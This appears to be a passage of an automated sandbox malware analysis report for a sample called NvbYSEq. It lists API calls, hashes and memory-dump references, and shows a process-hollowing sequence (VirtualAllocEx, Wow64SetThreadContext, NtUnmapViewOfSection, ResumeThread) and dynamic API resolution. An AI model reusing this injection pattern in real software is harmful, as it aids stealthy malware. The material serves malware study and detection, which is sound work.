                                      • Instruction Fuzzy Hash: 1321E4B5901209DFDB10CFAAD484ADEFBF4EB48310F14802AE958A7350D379A955CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 742 686f6b8-686f745 ReadProcessMemory 745 686f747-686f74d 742->745 746 686f74e-686f77e 742->746 745->746
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0686F738
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: ad735e5d9c06ea690ec4bbe328ceae1828a3210fcab872552bcb6bbba5941e8e
                                      • Instruction ID: b76353eae635d065acd527b4f854a6ef6bacdc833c0e85cffbaa29c1a2517965
                                      • Opcode Fuzzy Hash: ad735e5d9c06ea690ec4bbe328ceae1828a3210fcab872552bcb6bbba5941e8e
                                      • Instruction Fuzzy Hash: FD2125B18003499FDF10CFAAC885BEEBBF5FF48310F54842AE959A7240C7799945CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 732 686eff8-686f043 734 686f045-686f051 732->734 735 686f053-686f083 Wow64SetThreadContext 732->735 734->735 737 686f085-686f08b 735->737 738 686f08c-686f0bc 735->738 737->738
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0686F076
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 251306bd4cbd4282b2eefeab1ca6f720e4810c14b9a04e6ba2232a1b20f00e15
                                      • Instruction ID: d6e7a59b2a933c39eb39f283549d96ece8c12183bc27aca30c248230162ca32c
                                      • Opcode Fuzzy Hash: 251306bd4cbd4282b2eefeab1ca6f720e4810c14b9a04e6ba2232a1b20f00e15
                                      • Instruction Fuzzy Hash: 1C217771D003088FDB10CFAAC4857EEBBF5EF48314F54842AD559A7241CBB89944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C5B161,00000800,00000000,00000000), ref: 00C5B372
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 94998b25639c4d62b6239d95d51c6c8740665c333b48a415f2866e183e3dfa30
                                      • Instruction ID: d06d232a49965c7a5c69b1c13c3d92953595b93c0279124410fb3faa664a8b82
                                      • Opcode Fuzzy Hash: 94998b25639c4d62b6239d95d51c6c8740665c333b48a415f2866e183e3dfa30
                                      • Instruction Fuzzy Hash: 661114B68003489FDB10CF9AC444BEEFBF4EB48310F14842AE859B7210C775A949CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0686F576
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: c7ad9f799a7e9ad75d2bbeac014805f64bd2a8a5cf5880ebc1785a7ab15f9091
                                      • Instruction ID: 5597f7eb396792fc3d5abd210f5b9568a4e579eb3cf88683e8dc9a5603a3014f
                                      • Opcode Fuzzy Hash: c7ad9f799a7e9ad75d2bbeac014805f64bd2a8a5cf5880ebc1785a7ab15f9091
                                      • Instruction Fuzzy Hash: 481126718003489FDB10DFAAD844BDEBBF5EB48310F148429E655A7250C7759944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 74d85d8b2e6006783733b341585210d369f642f022c1ab21b153a12b482d4f1a
                                      • Instruction ID: 833c60cb8582c541294ea3b6189c7c1f43539955b769371f1f105d5319a7c77d
                                      • Opcode Fuzzy Hash: 74d85d8b2e6006783733b341585210d369f642f022c1ab21b153a12b482d4f1a
                                      • Instruction Fuzzy Hash: 581158B58043488FDB10CFAAC4457EEFBF4EB48324F24842AD55AA7240C7799545CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C5B161,00000800,00000000,00000000), ref: 00C5B372
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: ad45cf9815541abd6127f883d3624c08b0fb91af9d7928705f74662988a61fb6
                                      • Instruction ID: 17665f0e74f5f56163d8b1f25115b06e01ae67d4d279f59548643b6e578dff12
                                      • Opcode Fuzzy Hash: ad45cf9815541abd6127f883d3624c08b0fb91af9d7928705f74662988a61fb6
                                      • Instruction Fuzzy Hash: 9C1114B6C00349CFDB10CFAAC444ADEFBF4EB48310F14852AD829A7650C375AA45CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 069132C5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545774999.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6910000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: f60410fdf3a8b8dc7cf0ede93e11a8f43a1bb8050da2afd8737992c2f72ba9da
                                      • Instruction ID: e6dd24010c41bf650f7af30164b1f1659d2525a9366dad268e4b7a76c96859c7
                                      • Opcode Fuzzy Hash: f60410fdf3a8b8dc7cf0ede93e11a8f43a1bb8050da2afd8737992c2f72ba9da
                                      • Instruction Fuzzy Hash: 47113AB5804388CFCB11CFA9C444BDEBFF4AB09310F24885AD454A7652C375A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: ba885e1d20c7a39bc73973d1ba7ac259f390cccc78df388f21ccb329376b5a23
                                      • Instruction ID: c72f6618bfe9377bf569bd7b6279721dbcd0f7afc18e79001289b1121248a1d9
                                      • Opcode Fuzzy Hash: ba885e1d20c7a39bc73973d1ba7ac259f390cccc78df388f21ccb329376b5a23
                                      • Instruction Fuzzy Hash: 701136B5D043488FDB10DFAAC4457EFFBF4EB88324F248429D559A7240CB79A944CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 069132C5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545774999.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6910000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: b14eec6d1d47ffb789333e6086656b9ef763e76973c62071bbca6fdd6b348f76
                                      • Instruction ID: a41c947d9db5812c1bdbc3234396e64bf89e6184273f23eae0fa58d7324cb10b
                                      • Opcode Fuzzy Hash: b14eec6d1d47ffb789333e6086656b9ef763e76973c62071bbca6fdd6b348f76
                                      • Instruction Fuzzy Hash: 1A11F2B5804348DFDB50DF9AC845BDEBBF8EB48314F208819E959A7600C3B5A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00C5B0E6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: eed368506392f53a7b8c62eec8f204ceca0c033c9963439794c94b276c572fb0
                                      • Instruction ID: 35bea8db77733b5b4ca842b93877a9a43cb38aeac1512788b60438085112c2db
                                      • Opcode Fuzzy Hash: eed368506392f53a7b8c62eec8f204ceca0c033c9963439794c94b276c572fb0
                                      • Instruction Fuzzy Hash: 4D11D2B5C007498FDB10CF9AD444BDEFBF4EB88314F14842AD869A7250D375A949CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537194739.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_98d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3316a24c29e1b3633460769233b16a2ad8cd69270b3e92365be8798df08eb10
                                      • Instruction ID: 06479e04b2dac656877bbd88c1d4c5647d2643b4bc1f827dec6b63a1d01a9044
                                      • Opcode Fuzzy Hash: c3316a24c29e1b3633460769233b16a2ad8cd69270b3e92365be8798df08eb10
                                      • Instruction Fuzzy Hash: B5212871504204DFDB04EF20D9C0B26BB65FB98324F20C569D8090B3E6C33AE856CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537194739.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_98d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f10e2184a55737fcd08b8ad639803cfe296ac11deade689fa0b0b2cc7c7e82cd
                                      • Instruction ID: 256b34ea1771bfac5565e7f0967f1134317790c1874dedc443a47c1df79539c4
                                      • Opcode Fuzzy Hash: f10e2184a55737fcd08b8ad639803cfe296ac11deade689fa0b0b2cc7c7e82cd
                                      • Instruction Fuzzy Hash: EE210A71505240DFDB15EF14D9C0F26BF65FB98318F24C56AE8090B39AC336D856CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537259031.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_99d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7df6a5952a8e9539ce6a4c305c10089509ff684c97014e80cbc27f6c0ab78645
                                      • Instruction ID: 034a02427c2c0e6025d53d990319a6c210a09f935ab1b60f9b1d8b6243bba610
                                      • Opcode Fuzzy Hash: 7df6a5952a8e9539ce6a4c305c10089509ff684c97014e80cbc27f6c0ab78645
                                      • Instruction Fuzzy Hash: 9C21DE71604300DFDF14DF28D9C4B26BBA5EB88314F24C969E84A4B296C33AD856CA62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537259031.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_99d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0427153f80d7cf6d90333e49f6dc575d612d24de4d932c8ba763822695a1c478
                                      • Instruction ID: 6f455a4ff1129a5840afbbc59a4680007b927cb027ab79669a83dbff487a2dd8
                                      • Opcode Fuzzy Hash: 0427153f80d7cf6d90333e49f6dc575d612d24de4d932c8ba763822695a1c478
                                      • Instruction Fuzzy Hash: 8F212671504300EFEF05DF58D9C0B2ABBA5FB88314F20C96DE8594B292C33AD856CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537259031.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_99d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 20e5cfd0217d9dce8b2a01500cda8e8d8e6c7707d715b6b57b250724c52f194f
                                      • Instruction ID: 76caa28c25711abe6ba92228c08048785c814e9a5ce8180a145f6cc4586ddb25
                                      • Opcode Fuzzy Hash: 20e5cfd0217d9dce8b2a01500cda8e8d8e6c7707d715b6b57b250724c52f194f
                                      • Instruction Fuzzy Hash: AC215E755093808FDB12CF24D9D4715BF71EB46314F28C5EAD8898F6A7C33A984ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537194739.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_98d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction ID: fdd88ef2ba16efe931b72de362c315d41d8bec6c75b6c4ea467c4218036d8990
                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction Fuzzy Hash: BC11D376504240DFDB15DF10D5C4B16BF72FB94324F24C6A9D8490B7A6C33AE85ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537194739.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_98d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction ID: de924574d59b5a46b04f35552abcca7ba8e079bf26ccef153ea9d78642d3dd76
                                      • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                      • Instruction Fuzzy Hash: 0011E676504280DFCB15DF10D5C4B16BF71FB94318F24C6AAE8490B75AC336D85ACBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1537259031.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_99d000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                      • Instruction ID: ee488b1d3cfebd79ae008c6e08a082682c6779490fc4c6033e7302c8ef80e147
                                      • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                      • Instruction Fuzzy Hash: 9D118B75504280DFDB15CF14D5C4B19BBA1FB84314F24C6A9D8494B696C33AD84ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:1.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:2.4%
                                      Total number of Nodes:506
                                      Total number of Limit Nodes:9
                                      execution_graph: [interactive execution-graph rendering; the node-id/edge listing that the report draws as a graph is not reproducible as text here. Summary figures above: 506 nodes, 9 limit nodes, 1.1% execution coverage.]

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                      • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                      • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                      • API String ID: 4236061018-3687161714
                                      • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                      • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                      • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                      • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                      • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                      • ExitProcess.KERNEL32 ref: 004432EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID: PkGNG
                                      • API String ID: 1703294689-263838557
                                      • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                      • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                      • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                      • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                      • SetEvent.KERNEL32(?), ref: 00404E43
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                      • closesocket.WS2_32(?), ref: 00404E5A
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                      • SetEvent.KERNEL32(?), ref: 00404EA2
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                      • SetEvent.KERNEL32(?), ref: 00404EBA
                                      • CloseHandle.KERNEL32(?), ref: 00404EBF
                                      • CloseHandle.KERNEL32(?), ref: 00404EC4
                                      • SetEvent.KERNEL32(?), ref: 00404ED1
                                      • CloseHandle.KERNEL32(?), ref: 00404ED6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                      • String ID: PkGNG
                                      • API String ID: 2403171778-263838557
                                      • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                      • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                      • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                      • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                      • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                      • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                      • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                      • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                      • GetLastError.KERNEL32 ref: 0040D083
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorLastMutex
                                      • String ID: SG
                                      • API String ID: 1925916568-3189917014
                                      • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
